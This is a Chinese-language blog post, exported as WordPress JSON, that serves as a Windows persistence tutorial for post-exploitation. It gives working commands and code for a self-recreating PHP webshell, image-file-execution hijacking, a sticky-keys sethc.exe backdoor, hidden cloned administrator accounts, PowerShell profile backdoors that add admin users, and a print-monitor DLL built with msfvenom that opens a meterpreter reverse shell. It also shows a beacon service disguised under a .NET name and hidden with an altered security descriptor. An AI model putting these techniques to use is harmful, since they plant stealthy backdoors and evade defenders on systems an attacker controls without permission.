{"id":792,"date":"2025-10-24T15:33:30","date_gmt":"2025-10-24T07:33:30","guid":{"rendered":"https:\/\/www.youvii.site\/?p=792"},"modified":"2025-10-24T15:33:30","modified_gmt":"2025-10-24T07:33:30","slug":"windowsquanxianweichi","status":"publish","type":"post","link":"https:\/\/www.youvii.site\/index.php\/archives\/windowsquanxianweichi","title":{"rendered":"Windows\u6743\u9650\u7ef4\u6301"},"content":{"rendered":"<h1>Windows\u6743\u9650\u7ef4\u6301<\/h1>\n<h1>php \u4e0d\u6b7b\u9a6c\u6743\u9650\u7ef4\u6301<\/h1>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">&lt;?php\nignore_user_abort(); \/\/\u5173\u6389\u6d4f\u89c8\u5668\uff0cPHP\u811a\u672c\u4e5f\u53ef\u4ee5\u7ee7\u7eed\u6267\u884c.\nset_time_limit(0);\/\/\u901a\u8fc7set_time_limit(0)\u53ef\u4ee5\u8ba9\u7a0b\u5e8f\u65e0\u9650\u5236\u7684\u6267\u884c\u4e0b\u53bb\n$interval = 5; \/\/ \u6bcf\u9694*\u79d2\u8fd0\u884c\ndo {\n$filename = 'test.php';\nif(file_exists($filename)) {\necho \"xxx\";\n}\nelse {\n$file = fopen(\"test.php\", \"w\");\n$txt = \"&lt;?php phpinfo();?&gt;n\";\nfwrite($file, $txt);\nfclose($file);\n}\nsleep($interval);\n} while (true);\n?&gt;<\/code><\/pre>\n<h1>\u6620\u50cf\u52ab\u6301\u6280\u672f<\/h1>\n<p>\u6ce8\u518c\u8868<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurrentVersionImage File\nExecution Options<\/code><\/pre>\n<p>\u5728\u4e0b\u9762\u6dfb\u52a0\u4e00\u9879\uff0c\u8fd9\u91cc\u7684\u547d\u540d\u4e0e\u540e\u7eed\u8981\u89e6\u53d1\u7684\u53ef\u6267\u884c\u6587\u4ef6\u7a0b\u5e8f\u6587\u4ef6\u540d\u4e00\u81f4\uff0c\u8fd9\u91cc\u6211\u65b0\u5efa\u4e86\u4e00\u4e2amoon.exe<\/p>\n<p>\u7136\u540e\u5728moon.exe\u7684\u53f3\u4fa7\u65b0\u5efa\u4e00\u4e2aDebugger\uff0c\u5728\u8f93\u5165\u503c\u7684\u680f\u76ee\u4e2d\u586b\u5165\u4f60\u7684\u540e\u95e8\u7edd\u5bf9\u8def\u5f84\uff0c\u6211\u8fd9\u91cc\u4ee5cmd.exe\u4e3a\u4f8b<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  
src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae44b347d7.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609089916-cb156f71-4ef0-4482-b2f1-6596b2440e00.png\" \/><\/p>\n<p>\u5728\u684c\u9762 \u4fee\u6539\u4e00\u4e2a\u6587\u4ef6\u7684\u6587\u4ef6\u540d\u4e3amoon.exe \u53cc\u51fb \u5373\u53ef\u89e6\u53d1<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae44d88a47.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609094705-10686948-5b74-4160-bb96-f687bdfd9697.png\" \/>\u5982\u679c\u60f3\u5199\u5165\u540e\u95e8 \u628a \u8def\u5f84\u6362\u6210\u4f60\u540e\u95e8\u5730\u5740\u5373\u53ef<\/p>\n<h1>\u7ec4\u7b56\u7565\u811a\u672c\u7ef4\u6301<\/h1>\n<p>\u8f93\u5165gpedit.msc \u6253\u5f00\u7ec4\u7b56\u7565\uff0c\u6253\u5f00 windows\u8bbe\u7f6e \u811a\u672c \u91cc\u9762\u6709\u5173\u673a\u548c\u5f00\u673a<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae45037298.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609117595-ec622ef7-4f0b-4659-a79c-58c57260536d.png\" \/><\/p>\n<p>\u5728<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">C:\\Windows\\System32\\GroupPolicy\\Machine\\Scripts\\Startup<\/code><\/pre>\n<p>\u65b0\u5efa1.bat<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">@echo off\nsysteminfo &gt;1.txt<\/code><\/pre>\n<p>\u542f\u52a8\u65f6 \u9009\u62e9\u8be5\u811a\u672c\u6587\u4ef6\u5373\u53ef<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\"
data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae45248fe8.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609146969-d547986f-6793-484e-80a8-eff1978cccc5.png\" \/><\/p>\n<p>\u91cd\u542f\u540e<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae454c243f.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609155004-059375cd-25f4-4bfa-8fb6-011eefb8ccc6.png\" \/><\/p>\n<h1>shift\u540e\u95e8<\/h1>\n<p>\u6309\u7740shift\u4e94\u4e0b \u4f1a\u5f39\u51fa<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae4579730b.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609175098-41083b90-cd11-438a-bbc1-fba90c228959.png\" \/><\/p>\n<p>\u9996\u5148 \u66f4\u6539sethc.exe\u62e5\u6709\u8005 \u4e3aadministrator<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">move C:windowssystem32sethc.exe C:windowssystem32sethc.exe.bak\nCopy C:windowssystem32cmd.exe C:windowssystem32sethc.exe<\/code><\/pre>\n<p>\u63a5\u7740 cmd\u6539\u540d\u66ff\u6362 sethc.exe<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\".\/img\/NAEPrXYB_bbiSqvM\/1746609194221-0abae3a7-96c8-4ee4-9841-1f9ae25599d5-062603.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609194221-0abae3a7-96c8-4ee4-9841-1f9ae25599d5.png\" \/><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae45a39564.png\" class=\"lazy\" loading=\"lazy\" 
alt=\"1746609196994-bb354658-f688-4777-be75-84b1ae5c1100.png\" \/><\/p>\n<h1>\u5efa\u7acb\u5f71\u5b50\u8d26\u53f7<\/h1>\n<p>\u901a\u5e38\u5728\u62ff\u5230\u670d\u52a1\u5668\u540e\u4f1a\u521b\u5efa\u4e00\u4e2a\u5e26$\u7b26\u53f7\u7684\u8d26\u6237\uff0c\u56e0\u4e3a\u5728\u5e38\u89c4cmd\u4e0b\u662f\u65e0\u6cd5\u67e5\u770b\u5230\u7684<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae45c8d8ec.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609208393-d50269ed-1733-4a1a-95a7-08a788e484d6.png\" \/><\/p>\n<p>\u901a\u8fc7\u7ba1\u7406\u7528\u6237\u53ef\u67e5\u5230\u7528\u6237<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae45f22da5.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609217489-908521c8-5ebd-4648-bedc-270fb32b1693.png\" \/><\/p>\n<p>\u901a\u8fc7\u521b\u5efa\u5f71\u5b50\u8d26\u6237\u5219\u53ef\u4ee5\u5b8c\u5168\u89e3\u51b3\u8fd9\u79cd\u95ee\u9898\u3002<\/p>\n<p>\u6253\u5f00\u6ce8\u518c\u8868 HEKY_LOCAL_MACHINESAMSAMDomainsAccountUser<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae461e3c2b.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609223336-9f1e6d81-43e9-4007-a88f-1fab585f8598.png\" \/><\/p>\n<p>3ea\u662fmoonsec$\u7528\u6237 1F4\u662f\u8d85\u7ea7\u7ba1\u7406\u5458\u7684\u503c<\/p>\n<p>\u5c061F4\u4e0bF\u9879\u7684\u503c\u590d\u5236\u52303ea\u4e0bF\u9879\u91cc\u9762\uff0c\u66ff\u6362\u539f\u6709\u6570\u636e\u3002\u7136\u540e\u5bfc\u51famoonsec$\u4ee5\u53ca3EB\u3002<\/p>\n<p>\u5220\u9664 ner user moonsec$ \/del 
\u5220\u9664\u8fd9\u4e2a\u7528\u6237 \u518d\u5bfc\u5165\u6ce8\u518c\u8868 \u53ef\u4ee5\u770b\u5230 \u7528\u6237\u5df2\u7ecf\u4e0d\u663e\u793a\u5728\u8fd9\u4e2a\u9762\u677f\u4e86<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae4644ab64.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609243107-7c7eaff1-37f5-430a-b4cd-46140372aae0.png\" \/><\/p>\n<p>\u7528moonsec$\u767b\u5f55\u8fdc\u7a0b\u7ec8\u7aef<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae466a55bf.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609250644-d4834654-b07d-4130-be0e-6eebf2f40a15.png\" \/><\/p>\n<h1>powershell\u914d\u7f6e\u6587\u4ef6\u540e\u95e8<\/h1>\n<p>Powershell\u914d\u7f6e\u6587\u4ef6\u5176\u5b9e\u5c31\u662f\u4e00\u4e2apowershell\u811a\u672c\uff0c\u5b83\u53ef\u4ee5\u5728\u6bcf\u6b21\u8fd0\u884cpowershell\u7684\u65f6\u5019\u81ea\u52a8\u8fd0\u884c\uff0c\u6240\u4ee5\u53ef\u4ee5\u901a\u8fc7\u5411\u8be5\u6587\u4ef6\u5199\u5165\u81ea\u5b9a\u4e49\u7684\u8bed\u53e5\u7528\u6765\u957f\u671f\u7ef4\u6301\u6743\u9650<\/p>\n<p>\u4f9d\u6b21\u8f93\u5165\u4ee5\u4e0b\u547d\u4ee4\uff0c\u67e5\u770b\u5f53\u524d\u662f\u5426\u5b58\u5728\u914d\u7f6e\u6587\u4ef6<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">echo $profile\nTest-path $profile<\/code><\/pre>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae4698c457.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609275446-15c1e298-ad3b-4e2f-b00e-8870d6f5d496.png\"
\/><\/p>\n<p>\u5982\u679c\u8fd4\u56defalse\u5219\u9700\u8981\u521b\u5efa\u4e00\u4e2a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">New-Item -Path $profile -Type File \u2013Force<\/code><\/pre>\n<p>\u7136\u540e\u5199\u5165\u547d\u4ee4\uff0c\u8fd9\u91cc\u6211\u4ee5\u521b\u5efa\u4e00\u4e2a\u7528\u6237\u4e3a\u76ee\u6807\uff0c\u4e5f\u53ef\u4ee5\u5199\u6210\u53cd\u5f39shell\u7684\uff0c\u56e0\u4e3a\u4e4b\u524d\u6d4b\u8bd5\u8fc7\u7a0b\u4e2d\u5199\u5165\u8fc7\u6570\u636e\uff0c\u6240\u4ee5\u8fd9\u91cc\u6211\u662f\u4e09\u6761\u5185\u5bb9<\/p>\n<p>1\u3001bat \u5185\u5bb9<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">net user moon 123456 \/add &amp; net localgroup administrators moon \/add<\/code><\/pre>\n<p>\u8fd9\u91cc\u7684C:1.bat\u662f\u6211\u7684\u540e\u95e8\u6587\u4ef6\u4f4d\u7f6e\uff0c\u5b9e\u6218\u60c5\u51b5\u4e0b\uff0c\u5404\u4f4d\u9700\u8981\u6309\u7167\u5b9e\u9645\u6587\u4ef6\u8def\u5f84\u6765\u4fee\u6539<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">$string = 'Start-Process \"C:1.bat\"'\n$string | Out-File -FilePath $profile -Append\nmore $profile<\/code><\/pre>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae46c62b4a.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609379942-38016b24-7b44-45aa-ac15-aff975a128c5.png\" \/><\/p>\n<p>\u91cd\u65b0\u6253\u5f00powershell\u5c31\u4f1a\u81ea\u52a8\u6267\u884c<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae46e7a7b3.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609386691-3bcd859b-c08e-436a-9e6d-34fd5adcf8d8.png\" \/><\/p>\n<h1>Monitor 
\u6743\u9650\u7ef4\u6301<\/h1>\n<p>\u9879\u76ee\u5730\u5740 <a href=\"https:\/\/github.com\/Al1ex\/Monitor\">https:\/\/github.com\/Al1ex\/Monitor<\/a><\/p>\n<p>\u9879\u76ee\u8bf4\u660e<\/p>\n<p>\u7528\u4e8e\u5b9e\u73b0\u540e\u6e17\u900f\u6d4b\u8bd5\u9636\u6bb5\u6743\u9650\u7ef4\u6301<\/p>\n<p>\u9879\u76ee\u4f7f\u7528<\/p>\n<p>Step1\uff1a\u4e0b\u8f7d\u8be5\u9879\u76ee\uff0c\u4e4b\u540e\u4f7f\u7528VS\u7f16\u8bd1Monitor.cpp\uff0c\u5f53\u7136\u4e5f\u53ef\u4ee5\u4f7f\u7528\u7f16\u8bd1\u597d\u7684\uff0cMonitor.cpp\u4ee3\u7801\u5982\u4e0b\u6240\u793a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">#include \"Windows.h\"\nint main() {\nMONITOR_INFO_2 monitorInfo;\nTCHAR env[12] = TEXT(\"Windows x64\");\nTCHAR name[12] = TEXT(\"Monitor\");\nTCHAR dll[12] = TEXT(\"test.dll\");\nmonitorInfo.pName = name;\nmonitorInfo.pEnvironment = env;\nmonitorInfo.pDLLName = dll;\nAddMonitor(NULL, 2, (LPBYTE)&amp;monitorInfo);\nreturn 0;\n}<\/code><\/pre>\n<p>pName \/\/\u76d1\u89c6\u5668\u540d\u79f0<\/p>\n<p>pEnvironment \/\/\u73af\u5883\u67b6\u6784<\/p>\n<p>pDLLName \/\/\u76d1\u89c6\u5668DLL\u6587\u4ef6\u7684\u540d\u79f0<\/p>\n<p>Step 2\uff1a\u4f7f\u7528Msfvenom\u751f\u6210dll\u653b\u51fb\u8f7d\u8377\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">msfvenom -p windows\/x64\/meterpreter\/reverse_tcp LHOST=192.168.188.129 LPORT=4444\n-f dll &gt; shell.dll<\/code><\/pre>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae470b8274.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609441672-09102563-3ab9-42d2-ab3c-dc0f659b3472.png\" \/><\/p>\n<p>Step 
3\uff1a\u5c06shell.dll\u590d\u5236\u5230\u76ee\u6807\u4e3b\u673a\u7684system32\u76ee\u5f55\u4e0b\uff0c\u4e4b\u540e\u91cd\u547d\u540d\u4e3atest.dll(\u4e5f\u5c31\u662f\u4e0a\u9762\u7684PDLLName\uff0c\u4f60\u4e5f\u53ef\u4ee5\u81ea\u5df1\u4fee\u6539\u4e3a\u81ea\u5df1\u559c\u6b22\u7684\uff0c\u603b\u4e4b\u968f\u610f)<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">copy C:tempshell.dll C:WindowsSystem32test.dll<\/code><\/pre>\n<p>\u4e4b\u540e\u8fdb\u5165system32\u76ee\u5f55\uff0c\u5e76\u6267\u884c\u4ee5\u4e0b\u547d\u4ee4(Monitors.exe\u4e3a\u4e4b\u524d\u7f16\u8bd1\u597d\u7684\u6587\u4ef6\uff0c\u4e5f\u9700\u8981\u653e\u7f6e\u5230system32\u76ee\u5f55\u4e0b)\uff1a<\/p>\n<p>Step 4\uff1a\u4e4b\u540e\u8fdb\u5165system32\u76ee\u5f55\uff0c\u5e76\u6267\u884c\u4ee5\u4e0b\u547d\u4ee4(Monitors.exe\u4e3a\u4e4b\u524d\u7f16\u8bd1\u597d\u7684\u6587\u4ef6\uff0c\u4e5f\u9700\u8981\u653e\u7f6e\u5230system32\u76ee\u5f55\u4e0b)\uff1a<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae47383cec.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609472707-3fc25eb3-ffab-4b16-9e79-e1e459a09c0b.png\" \/><\/p>\n<p>Step 5\uff1a\u4e4b\u540e\u6210\u529f\u63a5\u6536\u5230Meterpreter\u4f1a\u8bdd<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae475ea555.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609479611-a9bc673d-f5cc-42c7-b314-17dd457a7b5d.png\" \/><\/p>\n<p>\u6301\u4e45\u5316\u5b9e\u73b0<\/p>\n<p>\u4e3a\u4e86\u5b9e\u73b0\u6301\u4e45\u6027\uff0c\u6211\u4eec\u9700\u8981\u5728&quot;Monitors&quot;\u6ce8\u518c\u8868\u4f4d\u7f6e\u4e0b\u8bbe\u7f6e\u4e00\u4e2akey:<\/p>\n<pre class=\"prettyprint linenums\" ><code 
class=\"language-basic\">HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlPrintMonitors<\/code><\/pre>\n<p>\u4e4b\u540e\u5728\u547d\u4ee4\u884c\u4e0b\u6267\u884c\u4ee5\u4e0b\u547d\u4ee4\u521b\u5efa\u4e00\u4e2a\u6ce8\u518c\u8868\u9879\uff0c\u8be5\u6ce8\u518c\u8868\u9879\u5c06\u5305\u542b\u503ctest.dll\uff0c\u4ece\u7f16\u8f91\u5668\u4e2d\u67e5\u770b\u6ce8\u518c\u8868\u9a8c\u8bc1\u5bc6\u94a5\u662f\u5426\u5df2\u521b\u5efa\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">reg add \"hklmsystemcurrentcontrolsetcontrolprintmonitorsPentestlab\" \/v\n\"Driver\" \/d \"test.dll\" \/t REG_SZ<\/code><\/pre>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae4784c430.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609505498-2f5997ae-76d2-48ee-b0a4-5c925cb83baf.png\" \/><\/p>\n<p>\u4e0b\u6b21\u91cd\u65b0\u542f\u52a8\u65f6\uff0cspoolsv.exe\u8fdb\u7a0b\u5c06\u52a0\u8f7dMonitors\u6ce8\u518c\u8868\u9879\u4e2d\u5b58\u5728\u5e76\u5b58\u50a8\u5728Windows\u6587\u4ef6\u5939System32\u4e2d\u7684\u6240\u6709\u9a71\u52a8\u7a0b\u5e8fDLL\u6587\u4ef6<\/p>\n<p>\u4e0b\u56fe\u6f14\u793a\u4e86Meterpreter\u4f1a\u8bdd\u5df2\u5efa\u7acb\u4e0ePrint Spooler\u670d\u52a1(SYSTEM)\u76f8\u540c\u7ea7\u522b\u7684\u7279\u6743\uff0c\u5e76\u4e14\u5df2\u4eceSystem32\u6587\u4ef6\u5939\u6267\u884c\u4e86<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae47a7524b.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609523607-28c53d2c-eaef-44e6-bf72-5bf23c5a6317.png\" 
\/><\/p>\n<h1>\u5229\u7528\u5b89\u5168\u63cf\u8ff0\u7b26\u9690\u85cf\u670d\u52a1\u540e\u95e8\u8fdb\u884c\u6743\u9650\u7ef4\u6301<\/h1>\n<p>\u901a\u8fc7\u6ce8\u518c\u670d\u52a1\u521b\u5efa\u540e\u95e8<\/p>\n<p>\u5c06\u540e\u95e8\u7a0b\u5e8f\u6ce8\u518c\u4e3a\u81ea\u542f\u52a8\u670d\u52a1\u662f\u6211\u4eec\u5e38\u7528\u7684\u4e00\u79cd\u8fdb\u884c\u6743\u9650\u7ef4\u6301\u7684\u65b9\u6cd5\uff0c\u901a\u5e38\u53ef\u4ee5\u901a\u8fc7sc\u6216\u8005powershell\u6765\u8fdb\u884c\u521b\u5efa\u3002<\/p>\n<p>cmd\u521b\u5efa\u81ea\u542f\u52a8\u670d\u52a1<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">sc create \".NET CLR Networking 3.5.0.0\" binpath= \"cmd.exe \/k\nC:Usersadministratorbeacon.exe\" depend= Tcpip obj= Localsystem start= auto<\/code><\/pre>\n<p>powershell\u521b\u5efa\u81ea\u542f\u52a8\u670d\u52a1<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">new-service \u2013Name \".NET CLR Networking 3.5.0.0\" \u2013DisplayName \".NET CLR Networking\n3.5.0.0\" \u2013BinaryPathName \"cmd.exe \/k C:Usersadministratorbeacon.exe\" \u2013\nStartupType AutomaticDelayedStart<\/code><\/pre>\n<p>\u4f46\u521b\u5efa\u7684\u670d\u52a1\u5f88\u5bb9\u6613\u88ab\u53d1\u73b0 \u901a\u8fc7 sc query \u548c Get-Service \u5f88\u5bb9\u6613\u53d1\u73b0\uff0c\u76f4\u63a5\u67e5\u8be2\u670d\u52a1\u4e5f\u80fd\u770b\u89c1<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae47c975cc.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609558773-dd747cd9-5c14-43ea-9e8f-6acad9be73ed.png\" \/><\/p>\n<p>\u901a\u8fc7\u4fee\u6539SDDL(\u5b89\u5168\u63cf\u8ff0\u7b26)\u9690\u85cf\u670d\u52a1<\/p>\n<p>\u4f17\u6240\u5468\u77e5\uff0cwindows\u8bbf\u95ee\u63a7\u5236\u6a21\u578b\u5206\u4e3a\u4e24\u90e8\u5206\uff1a<\/p>\n<p>access 
token(\u8bbf\u95ee\u4ee4\u724c)<\/p>\n<p>\u5b89\u5168\u63cf\u8ff0\u7b26<\/p>\n<p>\u5b89\u5168\u63cf\u8ff0\u7b26\u5305\u542b\u4e0e\u5b89\u5168\u5bf9\u8c61\u5173\u8054\u7684\u5b89\u5168\u4fe1\u606f\u3002\u5b89\u5168\u63cf\u8ff0\u7b26\u5305\u542b\u5b89\u5168\u63cf\u8ff0\u7b26\u7ed3\u6784\u53ca\u5176\u5173\u8054\u7684\u5b89\u5168\u4fe1\u606f\u3002\u5b89<\/p>\n<p>\u5168\u63cf\u8ff0\u7b26\u53ef\u4ee5\u5305\u542b\u4ee5\u4e0b\u5b89\u5168\u4fe1\u606f\uff1a<\/p>\n<p>\u5bf9\u8c61\u7684\u6240\u6709\u8005\u548c\u4e3b\u8981\u7ec4\u7684 Sid\uff08\u5b89\u5168\u6807\u8bc6\u7b26\uff09<\/p>\n<p>\u7528\u4e8e\u6307\u5b9a\u5141\u8bb8\u6216\u62d2\u7edd\u7279\u5b9a\u7528\u6237\u6216\u7ec4\u7684\u8bbf\u95ee\u6743\u9650\u7684 DACL \u3002<\/p>\n<p>\u6307\u5b9a\u4e3a\u5bf9\u8c61\u751f\u6210\u5ba1\u6838\u8bb0\u5f55\u7684\u8bbf\u95ee\u5c1d\u8bd5\u7c7b\u578b\u7684 SACL \u3002<\/p>\n<p>\u4e00\u7ec4\u9650\u5236\u5b89\u5168\u63cf\u8ff0\u7b26\u6216\u5176\u5404\u4e2a\u6210\u5458\u7684\u542b\u4e49\u7684\u63a7\u5236\u4f4d\u3002<\/p>\n<p>windows\u4e2d\u7684\u5b89\u5168\u5bf9\u8c61\u90fd\u4f7f\u7528SDDL\u5b57\u7b26\u4e32\u6765\u8868\u793a\u8bbf\u95ee\u5bf9\u8c61\u5bf9\u4e8e\u5b89\u5168\u5bf9\u8c61\u7684\u6743\u9650\uff0c\u670d\u52a1\u81ea\u7136\u4e5f\u5b58\u5728\u5176SDDL\uff0c\u5e76\u4e14sc\u547d\u4ee4\u4e2d\u53ef\u4ee5\u8bbe\u7f6eSDDL\u3002\u90a3\u4e48\u901a\u8fc7\u66f4\u6539SDDL\u53ef\u4ee5\u4fee\u6539\u670d\u52a1\u7684\u5404\u79cd\u6743\u9650\u6765\u9690\u85cf\u670d\u52a1<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">sc sdset \".NET CLR Networking 3.5.0.0\" \"D:(D;;DCLCWPDTSD;;;IU)\n(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)\n(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)\n(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)\"<\/code><\/pre>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" 
data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae47eeaf08.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609587118-f1fa18c4-c1dc-4de5-acb6-2dfcf8363f83.png\" \/><\/p>\n<p>\u7136\u540e\u901a\u8fc7sc\u4e0eGet-Service\u67e5\u627e\u670d\u52a1\u5747\u65e0\u7ed3\u679c\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">sc query |findstr \".NET CLR Networking 3.5.0.0\"\nget-service | findstr \".NET CLR Networking 3.5.0.0\"<\/code><\/pre>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae4817c457.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609601579-fbd555c7-5124-419a-acf9-e52c44bb29c2.png\" 